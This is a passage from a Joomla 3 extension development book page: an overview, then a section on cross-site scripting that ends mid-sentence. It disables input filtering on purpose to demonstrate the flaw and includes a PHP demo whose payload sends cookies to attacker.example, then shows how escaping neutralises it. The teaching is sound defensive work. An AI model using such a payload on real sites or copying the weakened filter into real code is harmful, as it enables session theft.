Learning Joomla! 3 Extension Development - Third Edition

By: Timothy John Plummer

Overview of this book

Joomla 3 is the first of the major open source content management systems that was meant to be mobile friendly by default. Joomla uses object-oriented principles, is database agnostic, and has the best mix of functionality, extensibility, and user friendliness. Add to that the fact that Joomla is completely community driven, and you have a winning combination that is available to everyone, and is the perfect platform to build your own custom applications. "Learning Joomla! 3 Extension Development" is an integrated series of practical, hands-on tutorials that guide you through building and extending Joomla plugins, modules, and components. With Joomla having been downloaded well over 35 million times, there is a huge market for Joomla extensions, so you could potentially earn some extra cash in your spare time using your newly acquired Joomla extension development skills. We will start with developing simple plugins and modules, and then progress to more complex backend and frontend component development. Then we will try our hand at ethical hacking, so you will learn about common security vulnerabilities and what you can do to avoid them. After that we will look at how you can prepare your extensions for distribution and updates, as well as how you can extend your components with various plugins and modules. Finally, you will end up with a fully functioning package of extensions that you can use on your own site or share with others. If you want to build your own custom applications in Joomla, then "Learning Joomla! 3 Extension Development" will teach you everything you need to know in a practical, hands-on manner.
Table of Contents (18 chapters)
Learning Joomla! 3 Extension Development
Credits
About the Author
Acknowledgement
About the Reviewers
www.PacktPub.com
Preface
Index

Cross-site scripting

Cross-site scripting (XSS) is a vulnerability that lets an attacker inject client-side script into pages served by your site. Because the injected script runs in the victim's browser under your site's origin, it can read the session cookie, submit forms on the user's behalf, or rewrite the page, all while appearing to come from you. Any input field or text area whose value is stored and later displayed without appropriate filtering on input and escaping on output is a potential doorway for an attacker to plant XSS in your website.

We can simulate this vulnerability by removing the input filtering on one of the fields in our form in the frontend updfolio view. Edit folio.xml located under /components/com_folio/models/forms and add the filter="raw" attribute to the company field, as shown at the end of the element below:

<field name="company" type="text" class="inputbox"
  size="40" label="COM_FOLIO_FIELD_COMPANY_LABEL"
  description="COM_FOLIO_FIELD_COMPANY_DESC" required="true" filter="raw" />

Setting filter="raw" tells Joomla! to accept the submitted value exactly as entered, bypassing the JFilterInput cleaning that normally strips HTML tags from form input. That is something you would not normally want to do for a free-text field, and it also means the only thing left between the stored value and a visitor's browser is whatever escaping the view template applies when it outputs the field.
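To make the effect of the filter attribute concrete, the following stand-alone PHP script traces a single malicious company value through the two stages the book's discussion touches: what the form filter lets into the database, and what the view does when it prints the value back out. This is an added example and not code from the book or from Joomla; the payload is constructed, the function names are hypothetical, and strip_tags() is used as a stand-in for the tag stripping that JFilterInput::clean() performs when a field has no filter attribute.

```php
<?php
// Added example, not from the book or from Joomla itself. It shows what the
// `filter` attribute on a JForm field decides (what reaches the database) and
// why the view must still escape on output. Function names are hypothetical;
// the real input cleaning in Joomla 3 is done by JFilterInput::clean().

// Constructed attacker input for the "company" field.
const PAYLOAD = 'Acme <script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// filter="raw": JForm::filter() returns the submitted value unchanged.
function filterRaw(string $value): string
{
    return $value;
}

// No filter attribute: JForm::filter() hands the value to JFilterInput::clean(),
// whose default instance allows no tags and therefore removes all HTML.
// strip_tags() is used here as an approximation of that behaviour.
function filterDefault(string $value): string
{
    return strip_tags($value);
}

// Output side. In a Joomla 3 view template this is $this->escape($value), which
// defaults to htmlspecialchars(). ENT_QUOTES is used here so that single quotes
// are encoded as well, which matters inside attribute values.
function escapeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Simulate the round trip: stored value -> HTML cell as the template would emit it.
function render(string $stored, bool $escape): string
{
    $cell = $escape ? escapeForHtml($stored) : $stored;
    return "<td>{$cell}</td>";
}

$cases = [
    'raw filter, unescaped output (vulnerable)'   => render(filterRaw(PAYLOAD), false),
    'raw filter, escaped output (safe)'           => render(filterRaw(PAYLOAD), true),
    'default filter, unescaped output (stripped)' => render(filterDefault(PAYLOAD), false),
];

foreach ($cases as $label => $html) {
    // A literal "<script" in the emitted markup is what the browser will execute.
    $verdict = stripos($html, '<script') !== false ? 'script tag survives' : 'no live script tag';
    printf("%-45s %s\n  %s\n", $label, $verdict, $html);
}
```

Running it from the command line (php folio_xss_demo.php) prints one line per case; only the first case leaves a live script tag in the markup. The third case shows why the default filtering in the form XML helps, but the second case is the one to remember: escaping at the point of output protects the page even when the stored value is hostile, so the view template should always escape user-supplied data regardless of what the form filter allowed in.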

Now via the updfolios view on your frontend, edit one of the records...